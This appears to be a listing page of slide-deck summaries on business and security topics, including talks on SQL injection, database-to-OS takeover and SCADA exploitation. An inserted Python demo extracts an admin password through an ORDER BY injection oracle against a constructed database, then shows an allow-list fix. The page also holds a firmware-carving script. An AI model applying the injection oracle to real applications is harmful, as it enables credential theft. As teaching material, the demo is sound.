This document summarizes Tim Brown's presentation on auditing big UNIX systems. Some key challenges with auditing these systems include limited access to systems, varying operating system capabilities between versions, and differences in audit methodologies. Better techniques for auditing include developing better scripting tools, performing gap analyses between audit methodologies, and leveraging common configuration enumerations. Going further requires understanding why auditing is needed, analyzing the full attack surface of systems, and considering real world complexities like operating system flaws and accumulating application features.
The HIS'15 website tells us "Our lives increasingly depend on the correct functioning of software". But whilst true in itself, software is just one of the links in a system-chain; each needing to be as strong as the others for a satisfactory outcome. History may have branded software as the weakest link, but can that be said today? A system is an entity complete in its context, and it is judged subjectively by its black-box behaviour. And when faced with its failure it isn't acceptable to claim that "my bit worked"! All technologies we utilise are fallible, as are the processes we use to create them: hardware, software, optics, acoustics, RF, mechanics, test, reproduction, maintenance ... Perfection is still reserved for the gods. Technologies must work together in the system, and historic silos do nothing to encourage this. So how good do systems need to be; how close to achieving it are we; and does one size fit all? And perhaps most challengingly, can the disciplines complement one another so the whole is stronger than the weakest links?
This document provides an overview of the global energy industry and Royal Dutch Shell's position within it. It analyzes industry trends, Shell's operations and competitors, scenarios for future energy demand, and Shell's strategies. The document compares a "Scramble" scenario of uncoordinated development to Shell's preferred "Blueprints" scenario of coordinated investment and policy to transition to a lower carbon future.
London, Paris, and Frankfurt remain the top three cities for business according to the European Cities Monitor survey. Easy access to markets, customers, and clients is the most important factor for companies in deciding where to locate. Berlin saw the biggest improvement in the rankings this year, rising six places. The survey provides insights into factors influencing business location decisions and the relative attractiveness and competitiveness of major European cities.
This curriculum vitae summarizes the professional experience and qualifications of Ahmed Hussien. He has over 10 years of experience in sales management roles within the water systems industry in Qatar, Egypt, and GCC markets. His most recent role was as Divisional Manager of the Water Systems Division at Tadmur Trading W.L.L. in Qatar, where he was responsible for managing sales, projects, services, and growth of the division. He holds a B.Sc. in Mechanical Power Engineering from Helwan University in Cairo, Egypt.
DKSH is a Swiss market expansion services group founded in the 1860s through the merging of three companies established by Swiss entrepreneurs who sailed to Asia to conduct business. DKSH operates across 36 countries in Asia Pacific and Europe, employing over 28,000 people. In 2015, DKSH generated annual net sales of CHF 10.1 billion and net income of CHF 199.6 million through its operations supporting clients' market access across various industries.
Cushman & Wakefield market beat report Q2 2013
by Trang Le
This report provides a summary of the Hanoi, Vietnam office and retail market conditions in Q2 2013. Grade B office supply continued to increase with two new buildings adding 32,000 sqm, while Grade A supply remained unchanged. Average asking rents for Grade B declined slightly while Grade A rates remained stable. Retail supply was unchanged in Q2, while average asking rents and occupancy rates held steady. Several new office and retail developments are scheduled to deliver over 800,000 sqm of additional space in the next two years.
The Case for Global Strategic and Collaborative Support for Israel
by Yael Simon
Sir Mick Davis delivers an uncompromising clarion call to philanthropists worldwide to address Israel's domestic needs, arguing that the existential threats from outside the country must be examined in order to understand how to solve its internal challenges. He backs this notion through support for Haredi employment, which he sees as a channel to harness all the strengths of the State of Israel: welfare, poverty, education, social cohesion, the economy and peace within the country.
Oakmont Limited provides business and finance services, document and records management solutions, and has expertise implementing the Concur expense management system for clients. They have over 30 years of experience working with major corporations in industries like manufacturing, services, and utilities. The company profiles several employees who have relevant roles, expertise, and experience delivering solutions to clients across different organizations and industries.
This document discusses DS Smith's brand management process and a campaign to raise awareness of zero waste. It overviews DS Smith's previous branding issues and a new 6-step brand management process. It then details a multi-channel campaign around the theme of achieving zero waste, including content creation, webinars, and analytics on website traffic, leads generated, and external recognition received.
The document discusses the growth of online retailing globally and its implications for physical retail space. It finds that while online retail is growing rapidly worldwide, the development of online markets varies between countries due to differences in infrastructure, technology adoption, culture and regulations. Retailers are increasingly pursuing multichannel strategies to capture online sales. For physical retail property, online growth is driving some retailers to reduce store counts or space needs, while others are pursuing smaller format stores, changing the optimal retail network. Large shopping centers remain well positioned by offering experiences, services and fulfillment options that complement online shopping.
The establishment of the Single Supervisory Mechanism is the first step towards a European Banking Union. The ECB will take responsibility for bank supervision in November 2014. Before then, the ECB will conduct an assessment of around 130 large banks through an Asset Quality Review and stress test. It is important that the ECB's assessment is seen as credible by capital markets in order to boost confidence in banks. However, there is a risk that a very tough assessment could undermine some governments' ability to recapitalize national banks. The ECB aims to enhance transparency, strengthen bank balance sheets, and rebuild trust. But a remaining issue is establishing a credible public backstop for banks through a Single Resolution Mechanism.
National Disaster Management In Afghanistan
by ABU_DRRGroup
This document outlines Afghanistan's national disaster management framework. It discusses the country's vulnerability to natural hazards like floods, droughts, and earthquakes. The National Disaster Management Authority (ANDMA) coordinates disaster response and works with provincial offices and line ministries. Key activities include conducting damage assessments, providing emergency relief, and establishing emergency operation centers. ANDMA has also developed disaster management plans and conducted public awareness campaigns. Moving forward, challenges remain around limited resources, security issues, and developing early warning systems.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate in detail the common and uncommon problems, and their respective solutions, with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
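The abstract above singles out ORDER BY and LIMIT clauses because the usual defence, bound parameters, does not apply there: column names and sort direction are identifiers, not values, so applications concatenate them. The following is an added example, not code from the slides or from sqlmap, using an in-memory SQLite database with a constructed schema and a constructed admin password. It shows the vulnerable query builder, a boolean-based inference oracle that reads the secret one character at a time purely from the order in which rows come back, and the hardened builder that maps the identifier through an allow-list and binds the row count.

```python
"""Added example, not from the original slides: SQL injection in ORDER BY / LIMIT
clauses against an in-memory SQLite database.  Schema, rows and the admin
password are constructed for the demo."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price)
            VALUES ('apple', 3.0), ('banana', 1.0), ('cherry', 2.0);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('admin', 'hunter2');
    """)
    return conn


def list_products_vulnerable(conn, sort_col, limit):
    # Column names and sort direction cannot be bound as parameters, so the
    # application concatenates them.  The attacker's input lands unquoted in
    # the statement, so quote escaping does nothing to stop it.
    sql = f"SELECT name FROM products ORDER BY {sort_col} LIMIT {limit}"
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    # Boolean-based inference through ORDER BY: a CASE expression sorts by
    # name when the condition holds and by price otherwise.  The row order in
    # the response is the only signal the attacker needs.
    payload = f"(CASE WHEN ({condition}) THEN name ELSE price END)"
    return list_products_vulnerable(conn, payload, 3) == ["apple", "banana", "cherry"]


def extract_admin_password(conn, charset="abcdefghijklmnopqrstuvwxyz0123456789",
                           max_len=32):
    # One oracle query per candidate character per position; the loop ends
    # when substr() runs past the end of the string and nothing matches.
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"(SELECT substr(password,{pos},1) FROM users "
                    f"WHERE username='admin')='{ch}'")
            if oracle(conn, cond):
                recovered += ch
                break
        else:
            break
    return recovered


ALLOWED_SORT = {"name": "name", "price": "price"}


def list_products_safe(conn, sort_col, limit):
    # Hardened version: the identifier is looked up in an allow-list (user
    # input never reaches the statement text) and the row count is range
    # checked and bound as a parameter.
    col = ALLOWED_SORT.get(sort_col)
    if col is None:
        raise ValueError("unknown sort column")
    limit = int(limit)
    if not 1 <= limit <= 100:
        raise ValueError("limit out of range")
    return [row[0] for row in conn.execute(
        f"SELECT name FROM products ORDER BY {col} LIMIT ?", (limit,))]


if __name__ == "__main__":
    db = make_db()
    print("recovered via ORDER BY oracle:", extract_admin_password(db))
```

The point of the allow-list is that the value the user sends is only ever a key; the string that reaches the SQL engine is one the application wrote itself. The same pattern applies to the sort direction (map to `ASC`/`DESC`) and to any other identifier position.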
Eicher Motors is an Indian automotive company that owns Royal Enfield motorcycles and has a joint venture called VE Commercial Vehicles. The document provides an overview of Eicher Motors' businesses and their operations. It discusses Royal Enfield motorcycles and their growth in India and globally. It also outlines VE Commercial Vehicles, which designs and markets trucks and buses through its brands Eicher Trucks and Buses and Volvo Trucks India. The joint venture was formed to modernize commercial transportation in India. The document then analyzes VE Commercial Vehicles' international business and provides a project overview to study competitors' distribution networks in African and Middle Eastern markets.
Expanding the control over the operating system from the database
by Bernardo Damele A. G.
A database, reached either through a SQL injection or through a direct connection, can be used as a stepping stone to control the underlying operating system.
There is much to say about operating system control once a database server is owned: Windows registry access, an anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protection bypasses, and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
The document discusses performance appraisal, which is a method for evaluating an employee's performance in areas such as quality, quantity, cost and time. It outlines several aims of performance appraisal including providing feedback to employees, identifying training needs, and forming the basis for personnel decisions. The document also discusses different performance appraisal methods such as management by objectives and 360 degree feedback, which involves collecting feedback from subordinates, peers and managers. It notes debates around performance appraisal and both benefits and challenges to implementing 360 degree feedback in organizations.
This document provides an introduction to the SMTP protocol and to the most important DNS records. It explains that SMTP is used to send e-mail over TCP ports and includes extensions such as ESMTP. It also describes the roles of the MTA, MUA and MDA servers in the mail delivery process, as well as the key DNS records: A, MX, CNAME, TXT, NS, SOA and PTR.
Containers, Docker, and Security: State Of The Union (LinuxCon and ContainerC...
by Jérôme Petazzoni
Containers, Docker, and Security: State of the Union
This document discusses the past, present, and future of container security with Docker. It summarizes that container isolation used to be a major concern but improvements have been made through finer-grained permissions and immutable containers. Image provenance is now a bigger issue but techniques like Docker Content Trust (Notary) help address it. Defense in depth with both containers and VMs is recommended. The security of containers continues to improve through practices like better upgrades, security benchmarks, and policies.
The document discusses memory forensics and rootkit detection. It covers why memory forensics is important for malware analysis and incident response. Key topics include memory acquisition tools, the Volatility memory forensics framework, rootkit techniques like DLL injection, hooking, and process/driver hiding used by malware. Detection methods for these rootkit behaviors using Volatility plugins are also presented. The document appears to be from a security training presentation on memory forensics and rootkit analysis.
The document summarizes key points from Day 1 of DockerCon. It discusses Docker's mission to build tools for mass innovation and how they are taking an incremental approach to reinventing the programmer's toolbox. New tools like Docker, Docker Compose, Docker Machine, Docker Swarm, Docker Networking plugins and Notary were introduced to help solve problems around runtimes, packaging, service composition, machine management, clustering, networking and security. Docker is also donating runC to the Open Container Project and forming the Open Container Project to establish open standards around container formats and governance.
Why defensive research is sexy too... and a real sign of skill
by Ollie Whitehouse
This document discusses the importance and challenges of defensive cybersecurity research. It notes that while offensive research may be easier due to exploitable technology vulnerabilities, defensive research is important for protecting systems and data from attackers. Defensive research involves efforts like finding and mitigating vulnerabilities, developing detection and response capabilities, understanding evolving attack techniques, and improving security standards and implementations. The document outlines many open challenges in areas like phishing, malware, memory corruption, and forensics. It argues that to be successful, defensive ideas must be practical, scalable, cost-effective, and widely adopted. The rewards of defensive research are more intangible compared to offensive research, but are still very important for enhancing security.
Eris Industries - American Banker presentation deck. Preston Byrne
Eris Industries' deck (and a recording of the talk) describing our view of where the blockchain space is going in the next couple of years. Any questions, ping Preston directly.
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team (MITRE ATT&CK)
From ATT&CKcon 3.0
By Brian Donohue, Red Canary
This presentation will highlight the Atomic Red Team project's efforts to define and increase the test coverage of MITRE ATT&CK techniques. We'll describe the challenges we encountered in defining what "coverage" means in the context of an ATT&CK-based framework, and how to use that definition to improve an open source project that's used by a diverse audience of practitioners to satisfy an equally diverse array of needs. The audience will learn how the Atomic Red Team maintainers standardize and categorize atomic tests, perform gap analysis to achieve deep technique-level coverage and broad matrix-level coverage, and quickly fill those gaps with new tests.
This document provides an overview of exploiting insecure IoT firmware. It begins with an introduction to IoT protocols like CoAP, MQTT, XMPP, and AMQP. It then discusses the OWASP top 10 security risks for IoT, focusing on insecure software/firmware. Common debugging interfaces for firmware like UART, JTAG, SPI, and I2C are explained. Operating systems and compilers used for IoT development are listed. Finally, the document outlines a methodology for exploiting insecure firmware, including getting the firmware, performing reconnaissance, unpacking, localizing points of interest, and then decompiling, compiling, tweaking, fuzzing, or pentesting the firmware. Tools mentioned include binwalk, firmwalk
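The unpacking and "localize points of interest" steps in the methodology above are usually done with binwalk, which works by scanning for file-format magic bytes and by profiling entropy to spot compressed or encrypted regions. The following is an added example, not code from the deck and not binwalk itself, that implements a miniature version of both over a constructed firmware blob (erased-flash padding, a stub uImage header, a stub ELF header and a gzip-compressed passwd line) so it runs offline; the signature table is a small hand-picked subset.

```python
"""Added example (not from the original deck): a miniature signature scanner,
entropy profiler and gzip carver of the kind binwalk automates, run over a
constructed firmware blob."""
import gzip
import math
import zlib

# Hand-picked subset of common firmware magic values.
SIGNATURES = {
    b"\x7fELF": "ELF executable",
    b"\x1f\x8b\x08": "gzip compressed data",
    b"hsqs": "SquashFS filesystem (little-endian)",
    b"sqsh": "SquashFS filesystem (big-endian)",
    b"\x27\x05\x19\x56": "U-Boot uImage header",
    b"070701": "ASCII cpio archive (newc)",
}


def find_signatures(blob):
    """Every (offset, description) where a known magic value occurs, in offset order."""
    hits = []
    for magic, desc in SIGNATURES.items():
        start = 0
        while True:
            idx = blob.find(magic, start)
            if idx < 0:
                break
            hits.append((idx, desc))
            start = idx + 1
    return sorted(hits)


def block_entropy(data):
    """Shannon entropy in bits per byte: ~0 for padding, ~8 for compressed/encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def entropy_profile(blob, block=256):
    """(offset, entropy) per block; high-entropy runs mark compressed or encrypted regions."""
    return [(off, round(block_entropy(blob[off:off + block]), 2))
            for off in range(0, len(blob), block)]


def carve_gzip(blob, offset):
    """Decompress one gzip member starting at offset; returns (payload, bytes consumed)."""
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+ selects gzip framing
    payload = d.decompress(blob[offset:])
    consumed = len(blob) - offset - len(d.unused_data)
    return payload, consumed


def build_demo_image():
    """Constructed blob: padding, uImage stub, ELF stub, gzip member, padding."""
    pad = b"\xff" * 256                               # erased flash reads as 0xff
    uimage = b"\x27\x05\x19\x56" + b"\x00" * 60       # uImage magic + zeroed fields
    elf = b"\x7fELF\x02\x01\x01" + b"\x00" * 57       # ELF64 LE ident + zeroed header
    passwd = b"root:$1$constructed$hash:0:0:root:/root:/bin/sh\n"
    return pad + uimage + elf + gzip.compress(passwd, mtime=0) + pad


if __name__ == "__main__":
    image = build_demo_image()
    for off, desc in find_signatures(image):
        print(f"0x{off:06x}  {desc}")
    for off, ent in entropy_profile(image):
        print(f"0x{off:06x}  entropy {ent}")
    payload, size = carve_gzip(image, 384)
    print(f"carved {size} bytes ->", payload)
```

On a real image the same loop is what tells you where the kernel ends and the root filesystem begins; the carved region is then what you hand to the decompile/fuzz/pentest steps.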
How to write clean & testable code without losing your mind
by Andreas Czakaj
If you create software that is to be developed continuously over several years you'll need a sustainable approach to code quality.
In our early days of AEM development, however, we used to struggle with code that is rigid, hard to test and full of LOG.debug calls.
In this talk I will share some development best practices we have found that really work in actual AEM based software, e.g. to achieve 100% code coverage and provide high confidence in the code base.
Spoiler alert: no new libraries, frameworks or tools are required - once you know the ideas, plain old TDD and the S.O.L.I.D. principles of Clean Code will do the trick.
by Andreas Czakaj, mensemedia Gesellschaft für Neue Medien mbH
Presented at the adaptTo() 2017 conference in Berlin (https://adapt.to/2017/en/schedule/how-to-write-clean---testable-code-without-losing-your-mind.html).
Presentation video can be found on YouTube (https://www.youtube.com/watch?v=JbJw5oN_zL4)
This document discusses modeling interoperation between devices in intelligent domotic environments. It proposes using an ontology called DogOnt to formally model devices and their interconnections in a technology-independent way. Rules for interoperation can be automatically generated from this model to allow communication between devices that use different networks or protocols. The approach was tested on a real-world setup with KNX and MyOpen devices, generating 58 rules with negligible runtime overhead. Modeling interconnections at a high level supports more flexible automation design and dynamic composition of device functions.
This document summarizes a keynote about Docker's goals of making hardware programmable through containers and open standards. The keynote discusses Docker's goals of reinventing the programmer's toolbox by solving problems like runtime, packaging, composition and networking incrementally. It also discusses building better infrastructure plumbing and promoting open standards through projects like runC, Notary, the Open Container Project and more. The goal is to help organizations solve problems in unique ways through an open developer platform and standards.
Professional Software Development, Practices and Ethics
by Lemi Orhan Ergin
The document discusses professional software development practices and ethics. It begins by showing code for hacking into a system using SSH and resetting the root password. It then discusses disabling grid nodes in a system. The rest of the document discusses the experience and background of Lemi Orhan Ergin, a senior software engineer, including his education and work history. It also provides an agenda for a presentation on how to become an ethical software developer, covering topics like waterfall development, Agile development, software craftsmanship practices, ethics in software engineering, and ethics in development.
This document summarizes a keynote about Docker's goals of making hardware programmable through containers and open standards. The keynote discusses Docker's goals of reinventing the programmer's toolbox by solving problems like runtime, packaging, composition and networking incrementally. It also discusses building better infrastructure plumbing and promoting open standards through projects like runC, Notary, the Open Container Project and more. The goal is to help organizations solve problems in unique ways through an open developer platform and standards.
Professional Software Development, Practices and EthicsLemi Orhan Ergin
The document discusses professional software development practices and ethics. It begins by showing code for hacking into a system using SSH and resetting the root password. It then discusses disabling grid nodes in a system. The rest of the document discusses the experience and background of Lemi Orhan Ergin, a senior software engineer, including his education and work history. It also provides an agenda for a presentation on how to become an ethical software developer, covering topics like waterfall development, Agile development, software craftsmanship practices, ethics in software engineering, and ethics in development.
This document summarizes a presentation about testing security in a Lotus Notes environment. The presentation covered breaking into a Lotus Notes/Domino system from external and internal perspectives. It demonstrated how to crack password hashes from documents, use cracked credentials to access additional databases and run commands, and upload a database shell to gain access to the operating system. The presentation warned that employees may pose one of the biggest security threats.
This document summarizes a talk given by Celil ÜNÜVER on vulnerabilities found in SCADA software. It begins with ÜNÜVER's background in security research. It then discusses how interest in SCADA security increased after Stuxnet in 2010. ÜNÜVER explains how he found many vulnerabilities by reversing SCADA software with little attention to security. Specific exploitation cases are presented, including vulnerabilities in CoDeSys, Progea MOVICON, Schneider Electric systems, and InduSoft HMI software. ÜNÜVER concludes that critical infrastructure systems are attractive targets for hackers due to their insecurity if connected to the internet.
1. The document discusses best practices for writing clean code in Jupyter notebooks, including breaking large notebooks into smaller ones focused on a single hypothesis-data-interpretation loop, creating a shared library for utilities, and writing each code cell to have a single logical output.
2. Key tips include organizing the notebook structure with sections for importing, getting data, modeling, visualization, and interpretation. Notebooks should be kept small with 4-10 cells each.
3. Clean code in Jupyter notebooks reads like well-written prose, with each cell presenting one clear idea, execution, and output.
Is Android the New Embedded Embedded Linux? at Embedded World 2013Opersys inc.
Android is increasingly being used in embedded systems due to its feature set, large developer community, and permissive licensing. However, there are still challenges to using Android for embedded projects, including limited documentation, inability to fully customize the software stack, long build times, and dependency on continued support from Google. Future trends may see Google and other companies continuing to adapt Android for more embedded and headless use cases.
Everything you've been told about blockchains is wrong: the "killer app" isn't any particular implementation, but the database design itself. In this presentation I explain how the permissioned blockchain design pioneered by Eris Industries actually addresses the problems and use-cases everyone's said blockchains can solve, but hasn't actually used them to solve.
Hint: it's not because of "decentralisation."
Containers, docker, and security: state of the union (Bay Area Infracoders Me...Jérôme Petazzoni
Docker is two years old. While security has always been at the core of the questions revolving around Docker, the nature of those questions has changed. Last year, the main concern was "can I safely colocate containers on the same machine?" and it elicited various responses. Dan Walsh, SELinux expert, notoriously said: "containers do not contain!", and at last year's LinuxCon, Jérôme delivered a presentation detailing how to harden Docker and containers to isolate them better. Today, people have new concerns. They include image transport, vulnerability mitigation, and more.
After a recap about the current state of container security, Jérôme will explain why those new questions showed up, and most importantly, how to address them and safely deploy containers in general, and Docker in particular.
Unembedding embedded systems with TDD: Benefits of going beyond the make it w...Francisco Climent Pérez
Slides of my talk 'Unembedding embedded systems with TDD: Benefits of going beyond the make it work phase' during the First International Test-Driven Development Conference, 10th July, 2021.
Complete event talks can be seen here:
https://www.youtube.com/watch?v=-_noEVCR__I
My talk starts at: 4:19:38
IoT Development from Software Developer PerspectiveAndri Yadi
My talk for IoT Bandung - MeetUp #15 event. As software developer, I share how to improve software development process when developing for IoT device, especially Arduino.
Civil engineers build structures to last. Aerospace engineers build airplanes for the long haul. Automotive engineers build cars to last. How about software engineers?
Not all of software needs to be engineered for long-life, but in some systems the predicted market span dictates we plan for the future. How can we do this, given the uncertainties in the technology industry?
What can we learn from the past?
How can we take informed bets on technologies and plan for change?
This session will cover some of the important technical considerations to make when thinking about the long term.
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...44CON
Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...44CON
One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.
Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless, once advanced quantum computers will be available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.
Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.
The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:
Lattice-based systems:
The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.
Code-based systems:
McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.
Non-commutative systems:
There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.
Multivariate systems:
Multivariate crypto can be explained to somebody who knows Gaussian elimination.
Hash-based signatures: If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.
I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.
In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...44CON
This document discusses the capabilities of SmartNICs and how they can address challenges in modern data centers. It describes how SmartNICs can offload processing tasks from servers to improve efficiency. It also explains how SmartNICs provide security benefits through isolation and embedded computing functions. The document provides examples of how SmartNICs can implement network functions like firewalls through open virtual switch software and customized packet processing rules. It suggests SmartNICs could potentially access host memory to gain visibility into the server for monitoring and security applications while running analysis functions in an isolated trusted domain on the SmartNIC.
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...44CON
Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulate machine learning systems and the potential these techniques pose for active offensive research.
The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:
Unexpected consequences (why did it decide this rifle is a banana?)
Data leakage (how did they know Joe has diabetes)
Memory corruption and other exploitation techniques (boom! RCE)
Influence the output
In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!
Garbage In, RCE Out :)
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...44CON
Numerous technical articles, presentations, and even books exists about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhances security? We’ll come to a conclusion after revealing some major vendor implementation problems.
Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.
The UK's Code of Practice for Security in Consumer IoT Products and Services ...44CON
The document discusses the UK's Code of Practice for Consumer IoT Security. It provides context on why the code was developed, including to address risks from poorly secured IoT devices. The code outlines 13 security practices for IoT manufacturers, including not using default passwords and keeping software updated. The document also discusses options for regulating adherence to the code and challenges in enforcing security standards.
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...44CON
Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.
Key theme:
This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.
In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.
Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.
That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.
At first, we thought this would be a trivial job: figure out the RF and take control. It turned in to a mammoth hardware, firmware and RF reversing project.
This puppy is so over-specced it would drive you to tears.
The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.
Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.
We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.
This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...44CON
Presented by: Julien Voisin and Thibault Koechlin
Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON
Saumil Shah presents Stegosploit, a technique for hiding browser exploits in images using steganography. The encoded exploit payload is hidden in the least significant bits of image pixels. When the image is loaded in a browser, the encoded exploit is automatically decoded and triggered without any visual distortion of the image. This allows delivering browser exploits covertly via innocent-looking images. Shah outlines various techniques for encoding exploits in JPEG and PNG images while overcoming lossy compression. The presentation concludes with discussions on the offensive opportunities and defensive challenges of such image-based attacks.
44CON London 2015 - Is there an EFI monster inside your apple?44CON
This document discusses EFI (Extensible Firmware Interface) and potential threats from EFI rootkits. It begins with an introduction to EFI and how it has replaced BIOS. It describes how EFI initializes systems at a low level and provides modular and feature-rich access. It then discusses potential malicious actions such as persisting across operating system reinstalls and bypassing full-disk encryption. It provides examples of real EFI rootkits and vulnerabilities discovered. It discusses tools and techniques for dumping and analyzing EFI contents, including the different regions stored in flash memory. Finally, it outlines the EFI boot process and programming interfaces.
44CON London 2015 - Indicators of Compromise: From malware analysis to eradic...44CON
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
44CON London 2015 - How to drive a malware analyst crazy44CON
This document discusses techniques that malware authors use to frustrate malware analysts, including inserting breakpoints, manipulating timing functions, exploiting Windows internals, anti-dumping measures, and virtual machine detection. The author then provides recommendations for malware analysts to identify and circumvent these anti-analysis techniques.
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON
This document summarizes a talk on conducting a 15-minute Linux live analysis to determine if a system has been hacked with minimal disturbance. The talk discusses opening a case, collecting key system data like processes and users through scripted network listeners, and analyzing the data to look for signs of compromise. It also covers next steps like dead analysis if evidence of hacking is found. The goal is to quickly identify breaches while preserving evidence through an automated and mostly non-invasive process.
44CON London 2015 - Going AUTH the Rails on a Crazy Train44CON
